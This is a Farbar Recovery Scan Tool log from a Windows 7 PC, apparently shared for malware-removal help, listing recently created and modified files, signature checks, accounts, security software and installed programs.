2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe

2016-10-12 10:01 - 2016-09-09 13:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys

2016-10-12 10:01 - 2016-09-09 13:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe

2016-10-12 10:01 - 2016-09-09 13:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe

2016-10-12 10:01 - 2016-09-09 13:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe

2016-10-12 10:01 - 2016-09-09 13:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe

2016-10-12 10:01 - 2016-09-09 13:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe

2016-10-12 10:01 - 2016-09-09 13:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll

2016-10-12 10:01 - 2016-09-09 13:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe

2016-10-12 10:01 - 2016-09-09 13:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe

2016-10-12 10:01 - 2016-09-09 13:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll

2016-10-12 10:01 - 2016-09-09 13:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll

2016-10-12 10:01 - 2016-09-08 16:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll

2016-10-12 10:01 - 2016-09-08 16:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll

2016-10-12 10:01 - 2016-09-08 16:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll

2016-10-12 10:01 - 2016-09-08 16:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll

2016-10-12 10:01 - 2016-09-08 10:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys

2016-10-12 10:01 - 2016-09-08 10:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys

2016-10-12 10:01 - 2016-08-12 13:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll

2016-10-12 10:01 - 2016-08-12 13:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL

2016-10-12 10:01 - 2016-08-12 13:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll

2016-10-12 10:01 - 2016-08-12 13:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx

2016-10-12 10:01 - 2016-08-12 13:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll

2016-10-12 10:01 - 2016-08-12 12:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL

2016-10-12 10:01 - 2016-08-12 12:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll

2016-10-12 10:01 - 2016-08-12 12:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll

2016-10-12 10:01 - 2016-08-12 12:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx

2016-10-12 10:01 - 2016-08-12 12:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll

2016-10-12 10:01 - 2016-08-12 12:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll

2016-10-12 10:01 - 2016-08-06 11:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll

2016-10-12 10:01 - 2016-08-06 11:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll

2016-10-12 10:01 - 2016-08-06 11:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll

2016-10-12 10:01 - 2016-08-06 11:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll

2016-10-12 10:01 - 2016-08-06 11:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll

2016-10-12 10:01 - 2016-08-06 11:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll

2016-10-12 10:01 - 2016-08-06 11:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll

2016-10-12 10:01 - 2016-08-06 11:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll

2016-10-12 10:01 - 2016-08-06 11:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll

2016-10-12 10:01 - 2016-08-06 11:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll

2016-10-12 10:01 - 2016-08-06 11:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll

2016-10-12 10:01 - 2016-08-06 11:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe

2016-10-12 10:01 - 2016-08-06 11:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe

2016-10-12 10:01 - 2016-08-06 10:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe

2016-10-12 10:01 - 2016-08-06 10:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe

2016-10-12 10:01 - 2016-08-06 10:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll

2016-10-12 10:01 - 2016-06-14 13:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys

2016-10-12 10:01 - 2016-06-14 13:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll

2016-10-12 10:01 - 2016-06-14 13:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll

2016-10-12 10:01 - 2016-06-14 13:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys

2016-10-12 10:01 - 2016-06-14 11:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll

2016-10-12 10:01 - 2016-06-14 11:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll

2016-10-12 10:01 - 2016-06-14 11:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe

2016-10-12 10:01 - 2016-06-14 11:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe

2016-10-12 10:01 - 2016-06-14 11:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe

2016-10-12 10:01 - 2016-06-14 11:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe

2016-10-12 10:01 - 2016-06-14 11:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe

2016-10-12 10:01 - 2016-06-14 11:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe

2016-10-12 10:01 - 2016-06-14 11:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe

2016-10-12 10:00 - 2016-09-12 17:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe

2016-10-12 10:00 - 2016-09-12 17:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll

2016-10-12 10:00 - 2016-09-09 11:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll

2016-10-12 10:00 - 2016-08-29 11:31 - 14183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll

2016-10-12 10:00 - 2016-08-29 11:31 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll

2016-10-12 10:00 - 2016-08-29 11:31 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll

2016-10-12 10:00 - 2016-08-29 11:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll

2016-10-12 10:00 - 2016-08-29 11:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll

2016-10-12 10:00 - 2016-08-29 11:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll

2016-10-12 10:00 - 2016-08-29 11:04 - 03229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe

2016-10-12 10:00 - 2016-08-29 10:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

2016-10-12 10:00 - 2016-08-16 16:40 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys

2016-10-12 10:00 - 2016-08-16 16:40 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys

2016-10-12 10:00 - 2016-08-16 16:40 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys

2016-10-12 10:00 - 2016-08-16 16:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys

2016-10-12 10:00 - 2016-08-16 16:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys

2016-10-12 10:00 - 2016-08-16 16:40 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys

2016-10-12 10:00 - 2016-08-16 16:40 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys

2016-10-12 10:00 - 2016-07-22 10:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe

2016-10-12 10:00 - 2016-07-22 10:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe

2016-10-10 12:44 - 2016-10-10 12:44 - 00006357 _____ C:\Users\Dwight\Downloads\firefox-patch.js

2016-09-28 15:49 - 2016-09-28 15:49 - 00049230 _____ C:\Users\Dwight\Documents\ULTRA ONE HEAVY DUTY SDS.pdf

2016-09-28 15:45 - 2016-09-28 15:45 - 00049218 _____ C:\Users\Dwight\Documents\ULTRA ONE G-5 SDS-4.pdf

2016-09-28 15:40 - 2016-09-28 15:39 - 00049218 _____ C:\Users\Dwight\Documents\ULTRA ONE G-5 SDS-3.pdf

2016-09-28 15:09 - 2016-09-28 15:09 - 00047738 _____ C:\Users\Dwight\Downloads\Attachments_2016928.zip

2016-09-28 15:09 - 2016-09-28 15:09 - 00000000 ____D C:\Users\Dwight\Downloads\Attachments_2016928

2016-09-21 09:31 - 2016-08-05 11:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll

2016-09-21 09:31 - 2016-08-05 11:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-17 14:41 - 2013-08-11 15:06 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job

2016-10-17 13:38 - 2009-07-14 00:45 - 00031472 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2016-10-17 13:38 - 2009-07-14 00:45 - 00031472 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2016-10-17 13:32 - 2015-12-13 20:11 - 00000000 ____D C:\Users\Dwight\AppData\Roaming\Skype

2016-10-17 13:31 - 2013-08-11 14:36 - 00000199 _____ C:\Windows\wstdUPSWSHIP.INI

2016-10-17 13:31 - 2013-08-09 22:15 - 00000000 ____D C:\Users\Dwight\AppData\Local\CrashDumps

2016-10-17 13:29 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2016-10-17 12:50 - 2013-08-11 14:33 - 00841118 _____ C:\Windows\SysWOW64\PerfStringBackup.INI

2016-10-17 12:50 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf

2016-10-17 12:49 - 2009-07-14 01:13 - 00841118 _____ C:\Windows\system32\PerfStringBackup.INI

2016-10-17 12:06 - 2012-10-01 15:26 - 00000000 ____D C:\Windows\Panther

2016-10-17 12:03 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\PolicyDefinitions

2016-10-17 11:54 - 2015-12-03 09:27 - 00000000 ____D C:\Windows\System32\Tasks\Remediation

2016-10-17 11:27 - 2016-01-28 21:45 - 00002459 _____ C:\Users\Public\Desktop\Norton Security with Backup.lnk

2016-10-17 11:27 - 2016-01-28 21:43 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security with Backup

2016-10-17 11:27 - 2016-01-28 21:43 - 00000000 ____D C:\Windows\system32\Drivers\NSBUx64

2016-10-17 10:37 - 2015-03-14 21:22 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service

2016-10-17 10:23 - 2016-01-28 21:45 - 00100592 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS

2016-10-17 10:23 - 2016-01-28 21:45 - 00008319 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT

2016-10-16 17:47 - 2016-01-28 21:56 - 00000833 _____ C:\Users\Public\Desktop\CCleaner.lnk

2016-10-16 17:26 - 2016-06-02 15:40 - 00000000 ____D C:\Users\Dwight\AppData\Local\Deployment

2016-10-16 12:52 - 2015-03-11 12:05 - 00000000 ____D C:\Users\Dwight\AppData\Local\NPE

2016-10-16 12:46 - 2015-03-11 12:08 - 00000000 ____D C:\NPE

2016-10-13 22:58 - 2016-03-18 15:21 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2016-10-13 22:58 - 2014-12-30 22:08 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2016-10-13 03:33 - 2009-07-14 00:45 - 00298760 _____ C:\Windows\system32\FNTCACHE.DAT

2016-10-13 03:32 - 2013-08-18 08:01 - 00000000 ____D C:\Program Files\Microsoft Silverlight

2016-10-13 03:32 - 2013-08-18 08:01 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight

2016-10-13 03:30 - 2014-12-10 04:20 - 00000000 ____D C:\Windows\system32\appraiser

2016-10-13 03:30 - 2014-11-26 05:30 - 00000000 ___SD C:\Windows\system32\CompatTel

2016-10-13 03:30 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\SysWOW64\Dism

2016-10-13 03:30 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\system32\Dism

2016-10-13 03:12 - 2013-08-18 07:55 - 00000000 ____D C:\Windows\system32\MRT

2016-10-13 03:06 - 2013-08-09 22:40 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe

2016-10-13 03:05 - 2013-08-18 08:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight

2016-10-12 04:13 - 2013-08-11 15:06 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2016-10-12 04:13 - 2013-08-11 15:06 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2016-10-12 04:13 - 2013-08-11 15:06 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

2016-10-12 04:13 - 2013-08-11 15:06 - 00000000 ____D C:\Windows\SysWOW64\Macromed

2016-10-12 04:13 - 2013-08-11 15:06 - 00000000 ____D C:\Windows\system32\Macromed

2016-10-04 13:41 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache

2016-09-28 15:49 - 2015-03-06 17:28 - 00000000 ____D C:\Users\Dwight\AppData\Local\CutePDF Writer

2016-09-28 15:38 - 2013-08-09 22:15 - 00000000 ____D C:\Users\Dwight\AppData\Roaming\Nitro PDF

2016-09-28 15:34 - 2013-08-09 21:57 - 00000000 ____D C:\Users\Dwight

==================== Files in the root of some directories =======

2013-08-09 21:58 - 2013-11-02 11:53 - 0007149 _____ () C:\Users\Dwight\AppData\Roaming\AbsoluteReminder.xml

2016-03-26 21:53 - 2016-03-26 21:53 - 0003584 _____ () C:\Users\Dwight\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

2016-10-17 11:24 - 2016-10-17 11:24 - 0007605 _____ () C:\Users\Dwight\AppData\Local\Resmon.ResmonCfg

2013-11-02 14:54 - 2013-11-02 14:54 - 0000057 _____ () C:\ProgramData\Ament.ini

2013-07-31 08:17 - 2013-07-31 08:17 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

2013-07-31 08:25 - 2013-07-31 08:25 - 0000107 _____ () C:\ProgramData\{324F76CC-D8DD-4D87-B77D-D4AF5E1AA7B3}.log

2013-07-31 08:22 - 2013-07-31 08:23 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log

2013-07-31 08:23 - 2013-07-31 08:24 - 0000110 _____ () C:\ProgramData\{B7A0CE06-068E-11D6-97FD-0050BACBF861}.log

2013-07-31 08:24 - 2013-07-31 08:24 - 0000115 _____ () C:\ProgramData\{D6E853EC-8960-4D44-AF03-7361BB93227C}.log

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-10-17 12:28

==================== End of FRST.txt ============================

==================== Start of Addition.txt ==========================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2016

Ran by Dwight (17-10-2016 15:25:50)

Running from C:\Users\Dwight\Downloads

Windows 7 Home Premium Service Pack 1 (X64) (2013-08-10 01:57:07)

Boot Mode: Normal

==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-2430109965-1150345540-996092904-500 - Administrator - Disabled)

Dwight (S-1-5-21-2430109965-1150345540-996092904-1000 - Administrator - Enabled) => C:\Users\Dwight

Guest (S-1-5-21-2430109965-1150345540-996092904-501 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Norton Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}

FW: Norton Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.0.0.19 - Absolute Software)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated)

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.215 - Adobe Systems Incorporated)

Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.185 - Adobe Systems Incorporated)

Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)

AlignmentUtility (x32 Version: 16.00.0000 - UPS) Hidden

Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

aspi (x32 Version: 3.00.0008.0000 - Eastman Kodak Company) Hidden

CCC (x32 Version: 16.00.0000 - United Parcel Service, Inc.) Hidden

CCHelp (x32 Version: 3.00.0010.0000 - Easlman Kodak Company) Hidden

CCleaner (HKLM\...\CCleaner) (Version: 5.22 - Piriform)

CCScore (x32 Version: 3.00.0020.0001 - Eastman Kodak) Hidden

Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.54.48.0 - Conexant)

Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)

CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version: 3.0 - Acro Software Inc.)

CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5119.52 - CyberLink Corp.)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

ESSAdpt (x32 Version: 3.00.0011.0000 - Eastman Kodak Company) Hidden

ESSANUP (x32 Version: 3.00.0004.0000 - Eastman Kodak Company) Hidden

ESSCAM (x32 Version: 3.00.0010.0000 - Eastman Kodak Company) Hidden

ESSCDBK (x32 Version: 3.00.0012.0000 - Eastman Kodak Company) Hidden

ESScore (x32 Version: 3.00.0019.0000 - Eastman Kodak) Hidden

ESSgui (x32 Version: 3.00.0017.0000 - Eastman Kodak) Hidden

ESShelp (x32 Version: 3.00.0011.0000 - Eastman Kodak Company) Hidden

ESSini (x32 Version: 3.00.0017.0001 - Eastman Kodak) Hidden

ESSPCD (x32 Version: 3.00.0012.0000 - Eastman Kodak Company) Hidden

